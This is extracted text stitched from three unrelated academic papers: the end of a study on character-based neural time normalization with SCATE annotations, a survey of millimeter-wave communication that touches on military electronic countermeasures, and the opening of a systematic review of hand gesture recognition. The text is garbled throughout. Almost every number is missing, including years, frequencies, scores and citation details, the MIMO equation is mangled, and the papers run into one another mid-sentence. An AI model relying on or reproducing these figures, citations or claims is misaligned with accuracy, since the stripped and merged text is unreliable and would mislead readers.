(p= . ) and the subset of time expressions that contain digits (p= . ). these results suggest that the reason character-based mod- els are more successful on the scate annotations is that scate breaks time expressions down into meaningful sub-components. for example, timeml would simply call monday, - - a date, and call : : gmt saturday a time. scate would identify four and five, respectively, different types of semantic entities in these expression; and each scate entity would be either all letters or all digits. in timeml, the model is faced with difficult learning tasks, e.g., that sometimes a weekday name is part of a date and sometimes it is part of a time, while in scate, a weekday name is always a day-of- week. on the other hand, running the entity composition step with gold entity identification achieves . in terms of f . one of the main causes of errors in this step is the heuristic to complete the interval-type property. as we explain in section . , we implement a too coarse set of rules for this case. another source of errors is the distance of the characters we use to decide if the time entities belong to the same time expression. this condition prevents the creation of some links, for example, the expression “later” at the beginning of a sentence typically refers to another time interval in a previous sentence, so the distance between them is much longer. conclusion we have presented the first model for time normaliza- tion trained on scate-style annotations. the model outperforms the rule-based state-of-the-art, proving that describing time expressions in terms of compo- sitional time entities is suitable for machine learn- ing approaches. this broadens the research in time normalization beyond the more restricted timeml schema. we have shown that a character-based neural network architecture has advantages for the task over a word-based system, and that a multi-output net- work performs better than producing a single output. furthermore, we have defined a new interval-based evaluation metric that allows us to perform a com- parison between annotations based on both scate and timeml schema, and found that scate pro- vides a wider variety of time expressions. finally, we have seen that the sparse training set available induces model overfitting and that the largest number of errors are committed in those cases that appear less frequently in the annotations. this is more significant in the case of explicit operators because they are very dependent on the lexicon. improving performance on these cases is our main goal for future work. accord- ing to the results presented in this work, it seems that a solution would be to obtain a wider training set, so a promising research line is to extend our approach to automatically generate new annotations. software the code for the scate-style time normalization models introduced in this paper is available at https://github.com/clulab/timenorm. acknowledgements we thank the anonymous reviewers as well as the action editor, mona diab, for helpful comments on an earlier draft of this paper. the work was funded by the thyme project (r lm ) from the national library of medicine, and used computing resources supported by the national science founda- tion under grant no. . the content is solely the responsibility of the authors and does not nec- essarily represent the official views of the national library of medicine, national institutes of health, or national science foundation. references [bethard and parker ] steven bethard and jonathan parker. . a semantically compositional anno- tation scheme for time normalization. in proceedings of the tenth international conference on language re- sources and evaluation (lrec ), paris, france, . european language resources association (elra). [bethard ] steven bethard. . a synchronous con- text free grammar for time normalization. in proceed- ings of the conference on empirical methods in natural language processing, pages – , seattle, washington, usa, . association for computational linguistics. [bird et al. ] steven bird, ewan klein, and edward loper. . natural language processing with python: analyzing text with the natural language toolkit. o’reilly media, inc. [chiu and nichols ] jason p. c. chiu and eric nichols. . named entity recognition with bidirectional lstm-cnns. transactions of the association for computational linguistic, : – . [chung et al. ] junyoung chung, caglar gulcehre, kyunghyun cho, and yoshua bengio. . empiri- cal evaluation of gated recurrent neural networks on se- quence modeling. arxiv preprint arxiv: . v . [collobert et al. ] ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (al- most) from scratch. the journal of machine learning research, : – , november. [fischer and strötgen ] frank fischer and jannik strötgen. . when does (german) literature take place? on the analysis of temporal expressions in large corpora. in proceedings of dh : annual conference of the alliance of digital humanities orga- nizations, volume , sydney, australia. [gillick et al. ] dan gillick, cliff brunk, oriol vinyals, and amarnag subramanya. . multilin- gual language processing from bytes. in kevin knight, ani nenkova, and owen rambow, editors, naacl hlt , the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, san diego california, usa, june - , , pages – . the association for computational linguistics. [graves et al. ] alex graves, abdel-rahman mo- hamed, and geoffrey hinton. . speech recog- nition with deep recurrent neural networks. in ieee international conference on acoustics, speech and signal processing, pages – . ieee. [han and lavie ] benjamin han and alon lavie. . a framework for resolution of time in natural language. ( ): – , march. [huang et al. ] zhiheng huang, wei xu, and kai yu. . bidirectional lstm-crf models for sequence tagging. corr, abs/ . . [kuru et al. ] onur kuru, ozan arkan can, and deniz yuret. . charner: character-level named entity recognition. in coling , th international con- ference on computational linguistics, proceedings of the conference: technical papers, december - , , osaka, japan, pages – . [lample et al. a] guillaume lample, miguel balles- teros, sandeep subramanian, kazuya kawakami, and chris dyer. a. neural architectures for named entity recognition. in proceedings of the con- ference of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – . association for compu- tational linguistics. [lample et al. b] guillaume lample, miguel balles- teros, sandeep subramanian, kazuya kawakami, and chris dyer. b. neural architectures for named entity recognition. in naacl hlt , the conference of the north american chapter of the as- sociation for computational linguistics: human lan- guage technologies, san diego california, usa, june - , , pages – . [lee et al. ] kenton lee, yoav artzi, jesse dodge, and luke zettlemoyer. . context-dependent semantic parsing for time expressions. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , baltimore, maryland, . association for computational linguistics. [lin et al. ] chen lin, elizabeth w. karlson, dmitriy dligach, monica p. ramirez, timothy a. miller, huan mo, natalie s. braggs, andrew cagan, vivian s. gainer, joshua c. denny, and guergana k. savova. . automatic identification of methotrexate- induced liver toxicity in patients with rheumatoid arthritis from the electronic medical record. jour- nal of the american medical informatics association, (e ):e –e . [llorens et al. ] hector llorens, leon derczynski, robert j. gaizauskas, and estela saquete. . timen: an open temporal expression normalisa- tion resource. in language resources and evaluation conference, pages – . european language re- sources association (elra). [ma and hovy ] xuezhe ma and eduard hovy. . end-to-end sequence labeling via bi-directional lstm-cnns-crf. in proceedings of the th annual meeting of the association for computational linguis- tics (acl ), volume . association for computa- tional linguistics. [mazur and dale ] pawet mazur and robert dale. . wikiwars: a new corpus for research on tempo- ral expressions. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. [plank et al. ] barbara plank, anders søgaard, and yoav goldberg. . multilingual part-of-speech tag- ging with bidirectional long short-term memory models and auxiliary loss. in proceedings of the th annual meeting of the association for computational linguis- tics (volume : short papers), pages – , berlin, germany, august. association for computational lin- guistics. [pustejovsky et al. a] james pustejovsky, josé castaño, robert ingria, roser saurı́, robert gaizauskas, andrea setzer, and graham katz. a. timeml: robust specification of event and temporal expressions in text. in iwcs- , fifth international workshop on computational semantics. [pustejovsky et al. b] james pustejovsky, patrick hanks, roser sauri, andrew see, robert gaizauskas, andrea setzer, dragomir radev, beth sundheim, david day, lisa ferro, and marcia lazo. b. the timebank corpus. in proceedings of corpus linguistics , lancaster. [pustejovsky et al. ] james pustejovsky, kiyong lee, harry bunt, and laurent romary. . iso-timeml: an international standard for semantic annotation. in proceedings of the th international conference on language resources and evaluation (lrec’ ), val- letta, malta. european language resources associa- tion (elra). [qi et al. ] yanjun qi, koray kavukcuoglu, ronan collobert, jason weston, and pavel p. kuksa. . combining labeled and unlabeled data with word-class distribution learning. in proceedings of the th acm conference on information and knowledge management, acm, pages – . [schilder ] frank schilder. . extracting meaning from temporal nouns and temporal prepositions. acm transactions on asian language information process- ing (talip) - special issue on temporal information processing, ( ): – , march. [strötgen and gertz ] jannik strötgen and michael gertz. . multilingual and cross-domain tem- poral tagging. language resources and evaluation, ( ): – . [strötgen and gertz ] jannik strötgen and michael gertz. . a baseline temporal tagger for all lan- guages. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal, september. associa- tion for computational linguistics. [strötgen et al. ] jannik strötgen, julian zell, and michael gertz. . heideltime: tuning english and developing spanish resources for tempeval- . in proceedings of the seventh international workshop on semantic evaluation, semeval ’ , pages – . asso- ciation for computational linguistics. [toutanova et al. ] kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic de- pendency network. in proceedings of the confer- ence of the north american chapter of the association for computational linguistics on human language technology - volume , naacl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. [uzzaman et al. ] naushad uzzaman, hector llorens, leon derczynski, james allen, marc verhagen, and james pustejovsky. . semeval- task : tempeval- : evaluating time expressions, events, and temporal relations. in second joint conference on lexical and computational semantics (*sem), volume : proceedings of the seventh international workshop on semantic evaluation (semeval ), pages – , at- lanta, georgia, usa, . association for computational linguistics. [verhagen et al. ] marc verhagen, robert gaizauskas, frank schilder, mark hepple, graham katz, and james pustejovsky. . semeval- task : tempeval temporal relation identification. in proceedings of the th international workshop on semantic evaluations, semeval ’ , pages – , prague, czech republic. [verhagen et al. ] marc verhagen, roser sauri, tom- maso caselli, and james pustejovsky. . semeval- task : tempeval- . in proceedings of the th international workshop on semantic evaluation, pages – , uppsala, sweden, . association for computa- tional linguistics. [vossen et al. ] piek vossen, rodrigo agerri, itziar aldabe, agata cybulska, marieke van erp, antske fokkens, egoitz laparra, anne-lyse minard, alessio palmero aprosio, german rigau, marco rospocher, and roxane segers. . newsreader: using knowledge resources in a cross-lingual reading machine to generate more knowledge from massive streams of news. special issue knowledge-based systems, elsevier. paper title (use style: paper title) doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , research and development of millimeter wave technology bai junying college of informationengineering north china university of science andtechnology tangshan, , china e-mail: @ .com an yongli* college of informationengineering north china university of science andtechnology tangshan, heibei, , china e-mail: tongxinayl@ .com abstract—this paper introduces the concept of millimeter wave, analyzes the advantages and disadvantages and propagation characteristics of millimeter wave, and expounds the research status of millimeter wave ground communication and millimeter wave satellite communication. the military application of millimeter wave communication technology in electronic countermeasures is taken as an example. finally, the outlook for millimeter wave communication technology will open up new application fields in the future and have broad development prospects. keywords-millimeter wave; millimeter wave propagation i. introduction with the rapid development of mobile communications, satellite communications, and on- board electronics, there is an increasing shortage of spectrum resources. however, users continue to put forward higher requirements on the speed, throughput and distance in wireless mobile communication, and the capacity requirements of the system are also getting higher and higher. due to the extremely rich spectrum resources in the high-frequency microwave band, modern communication systems are developing towards high-frequency microwaves, especially in the millimeter-wave band. millimeter wave communication has many unique features compared with traditional radio short wave, ultrashort wave and microwave communication. since the millimeter wave is made up of microwaves and light waves (its wavelength is between the microwave and the light wave), it has some advantages of microwave and light waves. the communication device is small in size, and can be used with a small-sized antenna to obtain high directivity, which facilitates concealment and confidentiality of communication. the extremely high attenuation rate of millimeter waves propagating in wireless space is the biggest obstacle faced by millimeter wave systems in outdoor wireless communication applications. fortunately, the millimeter wave has a small wavelength, allowing a large number of antennas to be installed without increasing the volume of the existing communication device, and the resulting large-scale antenna array can provide high beamforming gain, thereby obtaining sufficient link balance. the amount[ ]. at present, bell labs usa has achieved significant capacity improvement and related efficiency improvements by using large-scale mimo technology (multi-input and multi-output technology) in the millimeter wave band. with prototypes with peak transmission rates in excess of gbps, bell labs has successfully achieved spectral efficiencies of up to bps / hz in the ghz millimeter-wave band, and its transfer rate allows users to download faster using the network, enabling only a few hundred megabytes of data transfer is reached in a few seconds. the realization of millimeter wave communication technology has provided a new development direction for future research on the realization of touchable internet, low latency virtual reality and future applications such as d. ii. millimeter wave characteristics compared with light waves, millimeter waves use the atmospheric window (millimeter waves and submillimeter waves propagate in the atmosphere, the attenuation due to the absorption of gas molecules is a small frequency, the attenuation is small), the attenuation is small, by natural light and the influence of the heat radiation source is small. a. advantages ) extremely wide bandwidth. the millimeter wave frequency range is generally considered to be . to ghz, and the bandwidth is as high as . ghz. more than times the total bandwidth from dc to microwave. even considering atmospheric absorption, only four main windows can be used for propagation in the atmosphere, but the total bandwidth of the four international journal of advanced network, monitoring and controls volume , no. , windows is also up to ghz, which is five times the sum of the bandwidths of the bands below the microwave. this is undoubtedly very attractive today when the frequency resources are tight. ) the beam is narrow. the millimeter wave beam is much narrower than the microwave beam at the same antenna size. for example, a cm antenna has a beamwidth of degrees at . ghz and a beamwidth of only . degrees at ghz. it is therefore possible to distinguish small targets that are closer together or to see the details of the target more clearly. ) compared with lasers, the propagation of millimeter waves is much less affected by the climate and can be considered to have all-weather characteristics. ) millimeter wave components are much smaller in size than microwaves. therefore, the millimeter wave system is easier to miniaturize. b. disadvantages ) the attenuation in the atmosphere is severely attenuated. ) the processing precision of the device is high. iii. millimeter wave transmission characteristics usually the millimeter wave band refers to ghz to ghz, and the corresponding wavelength is mm to mm. millimeter wave communication refers to communication in which millimeter waves are used as a carrier for transmitting information. at present, most of the applied research focuses on several "atmospheric window" frequencies and three "attenuation peaks" frequencies[ ][ ]. a. is a typical line of sight transmission the millimeter wave belongs to the very high frequency band, and it propagates in space in the form of direct waves. the beam is narrow and has good directivity. on the one hand, since the millimeter wave is seriously affected by atmospheric absorption and rainfall fading, the single-hop communication distance is short; on the other hand, since the frequency band is high and the interference source is small, the propagation is stable and reliable. therefore, millimeter wave communication is a typical communication technology with a high quality, constant parameter wireless transmission channel. b. has "atmospheric window" and "attenuation peak" “atmospheric window” refers to the ghz, ghz, ghz, ghz, and ghz bands where millimeter wave propagation is less attenuated near these special frequency bands. in general, the “atmospheric window” band is more suitable for point-to-point communication and has been adopted by low-altitude air-to-ground missiles and ground-based radars. the attenuation near the ghz, ghz, and ghz bands has a maximum value of about db / km or more, which is called the "attenuation peak". often these "attenuation peak" bands are preferred by multi-channel concealed networks and systems to meet the network safety factor requirements. c. the attenuation is severe during rainfall compared with microwaves, millimeter-wave signals are much more attenuated under harsh climatic conditions, especially during rainfall, which seriously affects the propagation effect. the conclusion of the study is that the attenuation of the millimeter wave signal during rainfall is closely related to the instantaneous intensity of the rainfall, the length of the distance and the shape of the raindrop. further verification shows that: generally, the greater the instantaneous intensity of rainfall, the farther the distance, and the larger the raindrops, the more severe the attenuation. therefore, the most effective way to deal with rainfall attenuation is to leave enough level attenuation margin when designing a millimeter-wave communication system or communication line. d. strong penetration of dust and smoke atmospheric lasers and infrared light have poor penetrating power for dust and smoke, and millimeter waves have a clear advantage at this point. a large number of field tests have shown that millimeter waves have a strong penetrating power for dust and smoke, and can pass sand and smoke almost without attenuation. even under the conditions of higher intensity scattering caused by explosions and metal foil strips, even if fading occurs, it is short-lived and will recover quickly. as the ions diffuse and fall, they do not cause severe disruption of millimeter wave communication. iv. research status of millimeter wave communication current millimeter wave communication systems mainly include point-to-point communication on the earth and communication or broadcasting systems via satellite. point-to-point millimeter-wave communications on earth are now commonly used in relay communications where privacy is critical. the millimeter wave itself has strong concealment and anti- interference. at the same time, due to the attenuation of the millimeter wave in the atmosphere and the use of international journal of advanced network, monitoring and controls volume , no. , a small-diameter antenna, a very narrow beam and a small side lobes can be obtained, so the interception of millimeter wave communication is obtained. and interference becomes very difficult[ ]. a. millimeter wave ground communication the traditional application of millimeter wave terrestrial communication systems is relay (relay) communication. numerous tests of millimeter wave propagation have shown that multi-hop millimeter wave relay (relay) communication is feasible. in order to reduce the risk, we start with the low end of the millimeter wave band and the high end of the centimeter wave band. at the same time as the development of high-band and large-capacity communication systems, medium- and low-capacity short-range millimeter-wave communication devices in higher frequency bands have also been introduced. in the s, the wave of global informationization was ushered in. with the rapid development of the internet, the rapid growth of interactive multimedia services, broadband video services, and private network and radio communication, there is an urgent need to improve transmission rate, transmission bandwidth, and transmission quality. the demand for broadband access has become increasingly strong, and the development of various broadband access networks and devices has been promoted. wireless broadband access technologies using millimeter waves have emerged[ ]. b. millimeter wave satellite communication due to the abundant frequency resources, millimeter wave communication has been rapidly developed in satellite communication. for example, in the interstellar communication, the mm ( ghz) band is generally used because the atmospheric loss is extremely large at this frequency, and the ground cannot detect the interstellar communication content. in the interstellar, because the atmosphere is extremely thin, it will not cause the signal to decline. the us "tactical, strategic, and relay satellite systems" is an example. the system consists of five satellites with an upstream frequency of ghz, a downstream frequency of ghz, a bandwidth of ghz, and an interstellar communication frequency of ghz. compared with other communication methods, the main advantages of satellite communication are: a) the communication distance is long, and the cost of establishing the station is independent of the communication distance. b) working in a broadcast mode to facilitate multiple access. c) the communication capacity is large, and there are many types of services that can be transmitted. d) can be spontaneous, self-receiving, monitoring, etc. in the s and s, satellite communications were mostly carried out using geostationary orbits (also known as synchronous orbits). after the s, satellite communication systems using medium and low orbits came to the fore. however, in the case of large-capacity communication services, satellite communication systems using geostationary orbit are still the protagonists. according to statistics, in the years of the s, as many as communication satellites were launched into the synchronous orbit, with the c-band being the most and the ku-band being the second. the resulting spectrum congestion of satellite communications has also become increasingly prominent, and the move to higher frequency bands has become an inevitable trend. in fact, experimental research on millimeter-wave satellite communications began in the early s. most of the development work in this area is carried out in the united states, the former soviet union and japan. in the late s and s, in addition to the introduction of the experimental satellites in the millimeter-wave band that continued to be used in a wider range and more content, the practical ka-band satellite communication system began to appear. it should be noted that many of these satellites use a range of advanced technologies, including multi-beam antennas, on-board switching, on-board processing, and high-speed transmission. v. millimeter wave application military needs are an important factor in promoting the development of millimeter-wave systems. at present, millimeter waves have been widely used in radar, guidance, tactical and strategic communication, electronic countermeasures, remote sensing, and radiation measurement. among them, strategic communication and electronic countermeasures are very important application directions. electronic confrontation refers to the electromagnetic struggle between both hostile parties using electronic equipment or equipment, and is an important means in modern warfare. with the development of millimeter-wave radars and guidance systems, corresponding electronic countermeasures have also developed. in addition to strong firepower and high density in modern warfare, an important feature is that the entire battle is carried out in intense electronic confrontation. therefore, communication equipment is required to have strong anti-interference ability, and millimeter wave shows a international journal of advanced network, monitoring and controls volume , no. , clear advantage in this respect. for example, the selection of ship-to-ship millimeter-wave communications in the three "attenuation peak" bands of ghz, ghz, and ghz, using the characteristics of severe attenuation of signals in these bands, can greatly improve the anti-jamming and anti- jamming of ship-to-ship communication. interception ability. in foreign countries, the development of electronic countermeasure devices such as direction finding machines, jammers and signal analyzers in the millimeter wave band has been vigorously carried out. the millimeter wave beam is very narrow, and the side lobes of the antenna can be made very low, making reconnaissance and active interference more difficult. therefore, passive interference has a great development in the millimeter band. for millimeter waves below ghz, the most common means of interference is to place non-resonant millimeter-wave chaffs and aerosols to scatter the enemy millimeter- wave radar beam, which can interfere with a wider frequency band without having to accurately measure the enemy radar in advance. frequency of. in addition, it is also possible to generate plasma by explosion, thermal ionization or radioactive elements to absorb and scatter millimeter waves to interfere with enemy radar. the frequency coverage of most radar reconnaissance and warning systems in service has been extended to . ghz to ghz. according to reports, part of the radar reconnaissance equipment in the us electronic countermeasures equipment can reach ghz and is developing to ghz. the frequency of radar warning equipment has been extended to ghz to ghz. nato is developing a vehicle-mounted millimeter-wave warning device with a frequency range of ghz to ghz. in addition, the communication reconnaissance band covers the ghz millimeter band, and the communication interference portion below ghz has been put into practical use and is developing to ghz. stealth technology can also be utilized in the millimeter band. when dealing with an active millimeter wave radar, as in the microwave band, it is possible to reduce the shape of the radar cross section or apply a millimeter wave absorbing material such as ferrite to the surface to reduce the intensity of the reflected wave. for a passive radar that tracks the target by detecting the contrast between the low millimeter wave radiation of the metal target and the background radiation, a target with a strong millimeter wave radiation is applied to make the radiation and background radiation substantially equal. thereby merging the target into the background. in short, millimeter-wave communication is very necessary and significant for military applications. it is a promising communication means with narrow beam, high data rate, concealed radio waves, good confidentiality and anti-interference performance, and rapid opening. easy to use and flexible, and working around the clock. in addition to its application in the field of electronic countermeasures, the application of military millimeter wave communication includes far (outer space) near (atmosphere) distance communication, rapid emergency communication, submarine communication, satellite communication, interstellar communication, and the way down the microwave trunk line. cable breaks the device, etc. [ ] vi. related technology research a. millimeter wave multi-antenna system marconi proposed in to use mimo technology for anti-channel fading. in the s, at&t (american telephone & telegraph company) made a lot of groundbreaking work on the application of mimo technology to communication systems. in , teladar derived the system capacity of mimo under fading channels in the laboratory. in , foschini developed an algorithm for preprocessing signals in the mimo channel—d-blast (diagonal- blast) algorithm. in , wolinansky et al. used the v-blast (vertical-blast) algorithm in the laboratory to build a mimo system and obtained a spectrum utilization rate of bps/hz. this experiment caused great sensation in the communication industry and played a huge role in promoting the development of mimo technology. however, as let enters the commercial age, the demand for communication has increased year by year, and the performance of current mimo systems cannot meet the demand for communication. therefore, the massive mimo system has been proposed in recent years. massive mimo systems can make full use of space resources, greatly improve spectrum efficiency and power efficiency, and their system performance is greatly improved compared with mimo systems. massive mimo was first developed by thomas l. of bell labs, usa. researchers such as marzetta suggested. thomas l. researchers such as marzetta found that when the number of base station antennas tends to infinity, channel effects such as additive white gaussian noise and rayleigh fading are negligible, greatly increasing the data transmission rate. massive mimo has hundreds of antennas and even thousands international journal of advanced network, monitoring and controls volume , no. , of antennas at the base end, which is - orders of magnitude higher than the number of base station antennas in the existing lte-a, thus providing a higher transmission rate. the main consideration is the typical massive mimo system, which assumes that there is an antenna at the base station and serves a single antenna user (and receives signals). the downlink system block diagram is shown in figure . the received signal can be expressed as equation - : nxhwy p  /  ( ) among them,  is the downlink transmission power, k n h c   is the downlink channel matrix, ( , )cn obeys the distribution, n k w c   is the downlink precoding matrix, ( , , ) k p diag p p  is the power allocated by the base station to each user, k x c   is the signal vector before precoding, k n c   is additive gaussian white noise. figure . block diagram of the downlink system of the millimeter wave multi-antenna system b. interference alignment interference alignment technology is an emerging method of interference management. when multiple users perform wireless communication, there will be interference between each other, and the interference will affect the signal reception quality and reduce the channel capacity of the receiver. existing techniques for handling interference, such as frequency division multiplexing (fdma), time division multiplexing (tdma), and code division multiplexing (cdma), primarily eliminate the effects of interfering signals on desired signals by orthogonalizing the signals. in fact, when multiple users share spectrum resources, this processing method can only allocate spectrum resources among k users. for example, when the number of users interacting with each other is k, the spectrum resource that each user can obtain is /k of a single user. therefore, when the number of users is large, the spectrum resources available to each user are still very limited. the interference alignment technique was proposed to solve this problem. in , the system description was first given by professor syed a. jafar and his student viveck r. cadambe. the core idea is to jointly design the transmitter precoding matrix to divide the signal space into two parts: the desired signal space and the interference signal space. the precoding technique is used to make the interference overlap at the receiving end, thereby compressing the signal capacity occupied by the interference and eliminating interference. the effect on the desired signal is achieved for the purpose of increasing the channel capacity. taking the implementation of spatial interference alignment as an example, the core idea of interference alignment is to limit the interference signal to a range of stator space at the receiving end. after decoding the received interference suppression matrix, the subspace where the desired signal is located and the interference signal are located. the subspaces are just orthogonal, so the desired signal is not affected by the interfering signal. in the spatial interference alignment algorithm, the transmission precoding matrix and the reception interference suppression matrix are designed according to information such as the obtained channel matrix. vii. prospect millimeter wave communication technology is a typical dual-use technology. in the military field, it can be applied to inter-satellite communication or relay, secret communication in the millimeter wave band, and millimeter wave enemy and foe identification system; in the civilian field, it can be applied to broadband multimedia mobile communication systems, measurement radar, vehicle and ship collision avoidance, topographic mapping. , radio astronomy, interactive large-capacity television broadcasting and satellite millimeter wave link system and many other aspects, and will further expand its market. in short, a large amount of research work has been carried out in the field of domestic and foreign millimeter wave communication, covering everything from basic communication theory to practical system application, which fully demonstrates that millimeter wave communication is a promising wireless communication technology. international journal of advanced network, monitoring and controls volume , no. , acknowledgment national key research and development plan project ( yfe ) hebei provincial department of education science and technology project (qn ) hebei provincial natural science foundation (a ) north china university of technology doctoral research start-up grant project. references [ ] meng qingqi. application and development of millimeter wave communication[j]. microwave and satellite communications, , ( ): - . [ ] li yanli. research status and development of millimeter wave communication technology [a]. sichuan communication society. proceedings of annual conference of sichuan communication society [c]. sichuan communication society:, : . [ ] wang xiaohai. development and application of millimeter wave communication technology [j]. telecom express, , ( ): - . [ ] zou weixia, du guanglong, li bin et al. a new beam search algorithm in ghz millimeter wave communication. journal of electronics and information, [ ] zhang wei, li bin, liu yun, zhao chenglin. research on uplink hybrid beamforming technology in ghz millimeter wave communication. journal of electronics and information, [ ] wu zhengde. development of china's millimeter wave technology. journal of university of electronic science and technology of china, ( ) submitted january accepted august published september corresponding author mais yasen, mai @std.psut.edu.jo academic editor luciano fadiga additional information and declarations can be found on page doi . /peerj-cs. copyright yasen and jusoh distributed under creative commons cc-by . open access a systematic review on hand gesture recognition techniques, challenges and applications mais yasen and shaidah jusoh department of computer science, princess sumaya university for technology, amman, jordan abstract background. with the development of today’s technology, and as humans tend to naturally use hand gestures in their communication process to clarify their intentions, hand gesture recognition is considered to be an important part of human computer interaction (hci), which gives computers the ability of capturing and interpreting hand gestures, and executing commands afterwards. the aim of this study is to perform a systematic literature review for identifying the most prominent techniques, applications and challenges in hand gesture recognition. methodology. to conduct this systematic review, we have screened papers retrieved from ieee explore published from the year to , in the searching process keywords such as ‘‘hand gesture recognition’’ and ‘‘hand gesture techniques’’ have been used. however, to focus the scope of the study papers have been excluded. only the most relevant hand gesture recognition works to the research questions, and the well-organized papers have been studied. results. the results of this paper can be summarized as the following; the surface electromyography (semg) sensors with wearable hand gesture devices were the most acquisition tool used in the work studied, also artificial neural network (ann) was the most applied classifier, the most popular application was using hand gestures for sign language, the dominant environmental surrounding factor that affected the accuracy was the background color, and finally the problem of overfitting in the datasets was highly experienced. conclusions. the paper will discuss the gesture acquisition methods, the feature extraction process, the classification of hand gestures, the applications that were recently proposed, the challenges that face researchers in the hand gesture recognition process, and the future of hand gesture recognition. we shall also introduce the most recent research from the year to the year in the field of hand gesture recognition for the first time. subjects human–computer interaction keywords hand gesture, hand gesture applications, hand gesture recognition challenges, recognition techniques, recognition introduction a summary of the identification and selection of articles for inclusion in this review is presented in fig. , according to the prisma statement (moher et al., ). hand gestures are a non-verbal method of communication using the movements of the human how to cite this article yasen m, jusoh s. . a systematic review on hand gesture recognition techniques, challenges and applications. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:mai @std.psut.edu.jo https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. figure prisma flow diagram of the study selection process. full-size doi: . /peerjcs. /fig- hand. this method is used either on its own or with another parallel communication method such as speech (adam, ). the movements of a hand on the air as shown in fig. (rosalina et al., ), is an example of a sign language using hand gestures. the representation of hand gestures is varying from reflecting a certain action to delivering a message that actually has a meaning (adam, ). hand gestures are considered to be culture dependent, which means one gesture can range from giving a complimentary meaning to a giving a highly offensive meaning (adam, ). hand gestures are widely distributed on different kinds of applications, ranging from applications that are connected to the safety of humans, such as using hand gestures in controlling and directing flights yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure examples of hand gestures in sign language (rosalina et al., ). full-size doi: . /peerjcs. /fig- operations (landing and taking off), to applications that are made for pleasure purposes, such as using it in gaming (mohini et al., ). with the development of today’s technology, and as humans tend to naturally use hand gestures in their communication process to clarify their intentions, hand gestures can play an important role in interchanging information between humans and computers (aashni et al., ). in human–computer interaction (hci), hand gestures have a wide number of applications that can guarantee the speed of communicating with the computer, give a user-friendly and aesthetic environment that would attract users, provide a nonphysical contact with the computer from a distance for user comfort and safety, and control complex and virtual environments in a much easier approach (andrea, ). on the other hand, hand gesture applications demand the user to be an expert and well trained at employing and understanding the meaning of different gestures (samata & kinage, ). there are many possible numbers of hand gestures; therefore, for each application, a different group of gestures is used to perform its operations. also, from yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the computer perspective, the performance of recognizing hand gestures is affected by the environmental surroundings (such as light, background, distance, skin color) and the position and direction of the hand (vaibhavi et al., ). perceptual computing is providing the computers with the ability of knowing what is happening around it (bradley, ). in other words, the computer is capable of recognizing the different users and the different environmental factors occurring and existing in its surrounding. with that being said, hand gesture recognition is a type of perceptual computing user interface, that is used in hci to give the computers the capability of capturing and interpreting hand gestures, and executing commands based on an understanding made on a certain gesture (meenakshi & pawan singh, ). hand gesture recognition technique steps vary from simple to complex applications. generally, the steps are usually divided as the following: first hand gesture frame acquisition, then hand tracking, then feature extraction, and finally classification to reach the output gesture. hand gesture frame acquisition is to capture the human hand gesture by the computer (ananya, anjan kumar & kandarpa kumar, ). whereas hand tracking is the ability of the computer to trace the hand and separate it from the background and from the surrounding objects (ananya, anjan kumar & kandarpa kumar, ). the features needed to be extracted changes from one application to another, some of the features that could be taken into consideration are: fingers status, thumb status, skin color, alignments of fingers, and the palm position (ananya, anjan kumar & kandarpa kumar, ). in artificial intelligence, machine learning enables the computers to learn without being explicitly programmed (margaret, ). there are two types of learning; the process when algorithms reflect the gestures that has been learned in the past in training to new gestures is called supervised machine learning, and the process when algorithms draw inferences from the gestures is called unsupervised machine learning. classification aims of building a model to classify new hand gestures based on previous training gestures. the research work in hand gesture recognition has been developing for more than years (prashan, ). in , a system that detects the number of fingers bending using a hand glove was proposed by zimmerman (praveen & shreya, ). furthermore, gary grimes in developed a system for determining whether the thumb is touching another part of the hand or fingers (laura, angelo & paolo, ). in , despite the limited computer processing powers, the systems developed then gave promising results (prashan, ). the field of hand gesture recognition is very wide, and a big amount of work was conducted in the last to years. in this research, we survey the latest researches that were done on hand gesture recognition. we shall also compare the different techniques, applications, and challenges presented by the surveyed work. the reason why the most recent research articles from ieee database were chosen to be studied is that we wanted to construct a valid base of the current situation and technologies of hand gesture recognition. furthermore, the articles published by ieee in the year of to were considered to increase the intensity and focus of this study, and because the recent works were not sufficiently studied before, where the older ones were studied and compared more such yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as in rafiqul & noor ( ), arpita, sanyal & majumder ( ) and deepali & chitode ( ). the contribution of this research can be summarized as the following: . introducing the most recent researches from the year to the year in the field of hand gesture recognition for the first time. . comparing the different techniques proposed, applications applied, and challenges discussed in the current available technology of hand gestures recognition. the paper is structured as follows: survey methodology section describes the research questions and methods used. the following section includes the results and analysis of the work studied. then the next section discusses the future of hand gesture recognition. the last section concludes the research. survey methodology this review is guided by the following three research questions: . what are the techniques used in hand gesture recognition? . what are the domains and applications that make use of hand gesture recognition? . what are the challenges in hand gesture recognition applications? the first step of this systematic literature review is gathering all retrieved documents from the year to the year , where the process of screening includes downloading the papers published on ieee explore, and reading their titles and abstracts. two main keywords were used for the search process: hand gesture recognition and hand gesture techniques, other keywords were also used (such as hand gestures, hand gesture systems, hand gesture classification, hand gesture feature extraction, and sign language recognition) to include synonyms, where the keywords focused on the domain of research questions. the search process was performed by both authors (mais yasen and shaidah jusoh). a summary of the identification and selection of articles for inclusion in this review is presented in fig. , according to the prisma statement (moher et al., ). literature included , studies. after removing duplicates, titles were screened. the duplication occurs because the same work was retrieved more 